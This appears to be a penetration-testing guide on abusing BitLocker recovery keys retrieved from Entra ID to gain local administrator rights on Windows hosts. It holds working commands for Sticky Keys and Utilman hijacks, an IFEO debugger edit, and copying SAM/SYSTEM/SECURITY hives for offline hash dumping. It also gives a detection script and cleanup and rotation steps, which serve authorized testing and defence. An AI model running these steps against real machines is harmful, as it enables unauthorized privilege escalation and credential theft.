
BitLocker

If we have access to a BitLocker recovery key for the machine, we can boot into the Windows Recovery Environment (WinRE), unlock the volume and tamper with the OS to add our user to the local Administrators group.

Recovering the key via hybrid identity (Entra ID)

In many assumed-breach engagements the assigned account is a hybrid identity (synced from on-prem AD to Entra ID) and the workstation is Entra-joined or hybrid-joined with that user registered as its owner.

By default an Entra ID tenant lets users retrieve the BitLocker recovery keys of devices they own: the device setting Restrict users from recovering the BitLocker key(s) for their owned devices defaults to No. Every read of a key is written to the Entra audit log (category KeyManagement, activity Read BitLocker key), so the retrieval is visible to the blue team even though it needs no elevated role.

Check the join state of the device:

```powershell
dsregcmd /status
```

Look for AzureAdJoined : YES / DomainJoined : YES and a DeviceId. With the user's Entra credentials the recovery key for that DeviceId can then be retrieved through the user's own self-service device view in Entra; the DeviceId is the value the key records are indexed on.

If the device is only Intune/Entra-managed (no on-prem join) the key may also be exposed in the Company Portal.
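Scripted retrieval of the same keys over Microsoft Graph, as an added example that is not part of the original page. It assumes the Microsoft.Graph PowerShell module is installed, that the user can consent to the delegated User.Read and BitLockerKey.Read.All scopes (an assumption; the required scope can differ by tenant configuration), and that owner self-service recovery has not been restricted. The endpoints used, /me/ownedDevices and /informationProtection/bitlocker/recoveryKeys, are the v1.0 Graph resources.

```powershell
# Added example, not code from the original page.
# Assumptions: Microsoft.Graph module installed; the signed-in user may consent to the
# delegated scopes below; owner self-service key recovery is not restricted in the tenant.

Connect-MgGraph -Scopes 'User.Read', 'BitLockerKey.Read.All'

$graph = 'https://graph.microsoft.com/v1.0'

# Devices that list the signed-in user as owner. The deviceId here is the same
# value that dsregcmd /status prints as DeviceId.
$owned = (Invoke-MgGraphRequest -Method GET -Uri "$graph/me/ownedDevices?`$select=id,deviceId,displayName").value

foreach ($dev in $owned) {
    if (-not $dev.deviceId) { continue }        # ownedDevices can contain non-device objects

    # Key metadata is filterable by deviceId; the secret itself is not returned here.
    $filter = [uri]::EscapeDataString("deviceId eq '$($dev.deviceId)'")
    $keys = (Invoke-MgGraphRequest -Method GET `
        -Uri "$graph/informationProtection/bitlocker/recoveryKeys?`$filter=$filter").value

    foreach ($k in $keys) {
        # The 48-digit password is only disclosed on a single-object GET with $select=key;
        # that read is what shows up as "Read BitLocker key" in the Entra audit log.
        $full = Invoke-MgGraphRequest -Method GET `
            -Uri "$graph/informationProtection/bitlocker/recoveryKeys/$($k.id)?`$select=key"

        [pscustomobject]@{
            Device           = $dev.displayName
            DeviceId         = $dev.deviceId
            VolumeType       = $k.volumeType       # operatingSystemVolume / fixedDataVolume / removableDataVolume
            Created          = $k.createdDateTime
            KeyId            = $k.id
            RecoveryPassword = $full.key
        }
    }
}
```

Take the RecoveryPassword of the operatingSystemVolume entry for the target device into WinRE; keys for the other volume types only unlock data drives. Each single-object read produces its own audit entry, so pull only the key you need.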

Booting into WinRE and unlocking the volume

  1. Reboot the host and force entry into WinRE (hold Shift while clicking Restart, or power the machine off during boot two or three times in a row so that Automatic Repair starts). If WinRE has been disabled on the image (reagentc /info reports it), boot from Windows install media and use Repair your computer, which lands in the same environment.
  2. Navigate to Troubleshoot > Advanced options > Command Prompt. On a BitLocker-protected system WinRE asks for the recovery key before it opens the shell.
  3. If the volume is still locked, unlock it from the shell:

```cmd
manage-bde -status
manage-bde -unlock C: -RecoveryPassword XXXXXX-XXXXXX-XXXXXX-XXXXXX-XXXXXX-XXXXXX-XXXXXX-XXXXXX
```

In WinRE the OS volume is often mapped to D: (or another letter) rather than C:, and X: is the WinRE RAM disk itself. Check manage-bde -status and dir before using the paths below, and substitute the real letter.

Adding the user to local Administrators

With the volume mounted, the goal is to make code run as NT AUTHORITY\SYSTEM on the next boot. A few reliable options:

Sticky Keys hijack (sethc.exe)

Replace the Sticky Keys binary with cmd.exe. Pressing Shift five times on the logon screen then spawns a SYSTEM shell.

```cmd
copy C:\Windows\System32\sethc.exe C:\Windows\System32\sethc.exe.bak
copy /y C:\Windows\System32\cmd.exe C:\Windows\System32\sethc.exe
```

Reboot, hit Shift x5 at the logon screen and add the target user (for a cloud-only Entra account the member is written as AzureAD\user@tenant.com):

```cmd
whoami
net localgroup Administrators <DOMAIN>\<user> /add
```

net localgroup only accepts the group name, not a SID, so on a non-English system use the localised name (e.g. Administratoren on German Windows) or let PowerShell resolve the well-known SID S-1-5-32-544 directly:

```powershell
Add-LocalGroupMember -SID S-1-5-32-544 -Member "<DOMAIN>\<user>"
```

Utilman hijack (utilman.exe)

Same trick, but the binary is launched via Win + U (Ease of Access) on the logon screen. Useful if sethc.exe is monitored.

```cmd
copy C:\Windows\System32\utilman.exe C:\Windows\System32\utilman.exe.bak
copy /y C:\Windows\System32\cmd.exe C:\Windows\System32\utilman.exe
```

Other accessibility binaries (osk.exe, Narrator.exe, DisplaySwitch.exe, Magnify.exe) work equivalently and may evade naive detections.

Image File Execution Options debugger

Instead of overwriting a binary, register a Debugger value so the OS launches cmd.exe whenever the accessibility tool is invoked. sethc.exe itself is untouched, so its hash still matches and file-integrity checks or hash rules keyed on sethc.exe are not disturbed; cmd.exe still has to be permitted by whatever WDAC/AppLocker policy is in force, and a Debugger value under an accessibility key is itself a well-known indicator for EDR. The hive is edited offline from WinRE, so load it under a temporary key first (adjust C: to the letter WinRE assigned):

```cmd
reg load HKLM\TMP C:\Windows\System32\config\SOFTWARE
reg add "HKLM\TMP\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v Debugger /t REG_SZ /d "C:\Windows\System32\cmd.exe" /f
reg unload HKLM\TMP
```
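A check for both tampering patterns above, a swapped accessibility binary (Sticky Keys / Utilman and the other tools listed) and an IFEO Debugger value, as an added example that is not from the original page. It is meant for an elevated PowerShell session on the booted host, either to confirm the cleanup at the end of the engagement or for the blue team to hunt with. It assumes a default %SystemRoot% layout; the tool list is the one named above plus AtBroker.exe, and the OriginalFilename comparison is a heuristic, not proof.

```powershell
# Added example, not code from the original page. Run elevated on the live host.
# Assumption: default %SystemRoot% layout; the list below is the accessibility
# tools named above plus AtBroker.exe.

$sys32 = Join-Path $env:SystemRoot 'System32'
$ifeo  = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options'
$tools = 'sethc.exe','utilman.exe','osk.exe','Narrator.exe','DisplaySwitch.exe','Magnify.exe','AtBroker.exe'

# SHA-256 of the shells an attacker usually copies over the accessibility tool.
$shells = @{}
foreach ($s in 'cmd.exe','powershell.exe') {
    $p = Join-Path $sys32 $s
    if (Test-Path $p) { $shells[(Get-FileHash -Algorithm SHA256 $p).Hash] = $s }
}

$findings = foreach ($name in $tools) {
    $path = Join-Path $sys32 $name
    if (-not (Test-Path $path)) { continue }

    # 1. Binary replacement. A copied cmd.exe keeps a valid Microsoft signature
    #    (catalog signing is hash based), so signature status proves nothing here;
    #    compare hashes and the PE's own OriginalFilename instead.
    $hash = (Get-FileHash -Algorithm SHA256 $path).Hash
    $orig = (Get-Item $path).VersionInfo.OriginalFilename
    if ($shells.ContainsKey($hash)) {
        [pscustomobject]@{ Binary = $name; Issue = "replaced with $($shells[$hash])"; Detail = $hash }
    } elseif ($orig -and $orig -ne $name) {
        # Heuristic: a foreign binary dropped in place usually carries its own name here.
        [pscustomobject]@{ Binary = $name; Issue = 'OriginalFilename mismatch'; Detail = $orig }
    }

    # 2. Leftover from the copy/paste hijack (sethc.exe.bak and friends).
    if (Test-Path "$path.bak") {
        [pscustomobject]@{ Binary = $name; Issue = 'backup copy present'; Detail = "$path.bak" }
    }

    # 3. IFEO: any Debugger value means something else launches in its place.
    $dbg = (Get-ItemProperty -Path (Join-Path $ifeo $name) -Name Debugger -ErrorAction SilentlyContinue).Debugger
    if ($dbg) {
        [pscustomobject]@{ Binary = $name; Issue = 'IFEO Debugger set'; Detail = $dbg }
    }
}

if ($findings) { $findings | Format-Table -AutoSize } else { 'No accessibility-binary tampering found.' }
```

Run it once before the engagement to get a clean baseline and once after cleanup; an empty result on the second run is the evidence for the report that the host was returned to its original state.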

Offline SAM / SYSTEM extraction

If touching the OS is undesirable, copy the hives off the host and crack or pass-the-hash the local accounts offline. SAM plus SYSTEM yield the local NT hashes; SECURITY adds LSA secrets and cached domain logons (DCC2), which can be cracked but not passed. Copy to removable media rather than X:, which is the WinRE RAM disk and is discarded at reboot (E: below stands for the USB drive's letter):

```cmd
mkdir E:\loot
copy C:\Windows\System32\config\SAM      E:\loot\
copy C:\Windows\System32\config\SYSTEM   E:\loot\
copy C:\Windows\System32\config\SECURITY E:\loot\
```

Then on the attacker host:

```bash
impacket-secretsdump -sam SAM -system SYSTEM -security SECURITY LOCAL
```

Cleanup

  • Restore any binaries that were swapped (sethc.exe.bak back to sethc.exe) and delete the .bak copies.
  • Remove Image File Execution Options keys created during the attack.
  • Re-enable BitLocker protectors if they were suspended during testing (the WinRE unlock itself does not suspend them), and document in the report that the disclosed recovery key must be rotated (manage-bde -protectors -delete C: -type RecoveryPassword followed by manage-bde -protectors -add C: -RecoveryPassword). Because the key was read out of Entra, the replacement has to be escrowed there again (BackupToAAD-BitLockerKeyProtector), or the device loses self-service recovery; the old value stays listed in the portal but no longer unlocks the volume.
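The rotation step done from PowerShell with re-escrow to Entra, as an added example that is not from the original page. It assumes an elevated session on the booted hybrid or Entra-joined host with the built-in BitLocker module (Get-BitLockerVolume, Add-/Remove-BitLockerKeyProtector, BackupToAAD-BitLockerKeyProtector) and should be saved as a .ps1 because of the param block. It adds the new protector and backs it up before deleting the old one, so the volume is never left without an escrowed recovery password.

```powershell
# Added example, not code from the original page.
# Assumptions: elevated PowerShell on the booted host; BitLocker module present;
# host is hybrid/Entra-joined so BackupToAAD-BitLockerKeyProtector has somewhere to escrow to.
param([string]$MountPoint = 'C:')

$vol = Get-BitLockerVolume -MountPoint $MountPoint
$old = $vol.KeyProtector | Where-Object KeyProtectorType -eq 'RecoveryPassword'

# 1. Add the replacement first so the volume never lacks a recovery protector.
$new = (Add-BitLockerKeyProtector -MountPoint $MountPoint -RecoveryPasswordProtector).KeyProtector |
       Where-Object KeyProtectorType -eq 'RecoveryPassword' |
       Where-Object { $_.KeyProtectorId -notin $old.KeyProtectorId }

# 2. Escrow the new protector in Entra, the same store the leaked key came from.
#    If this throws, stop here: deleting the old protector would leave the
#    device with no recoverable key in the tenant.
BackupToAAD-BitLockerKeyProtector -MountPoint $MountPoint -KeyProtectorId $new.KeyProtectorId -ErrorAction Stop

# 3. Only then remove the compromised protector(s). The 48-digit value that was
#    disclosed during the engagement stops working at this point.
foreach ($p in $old) {
    Remove-BitLockerKeyProtector -MountPoint $MountPoint -KeyProtectorId $p.KeyProtectorId
}

# Summary for the engagement record; keep the new password in the vault, not in the report.
[pscustomobject]@{
    Volume      = $MountPoint
    RemovedIds  = ($old.KeyProtectorId -join ', ')
    NewId       = $new.KeyProtectorId
    NewPassword = $new.RecoveryPassword
}
```

Check afterwards that the Entra device record lists the new key ID under BitLocker keys; if the TPM protector was also suspended during the test, Resume-BitLocker -MountPoint C: re-arms it.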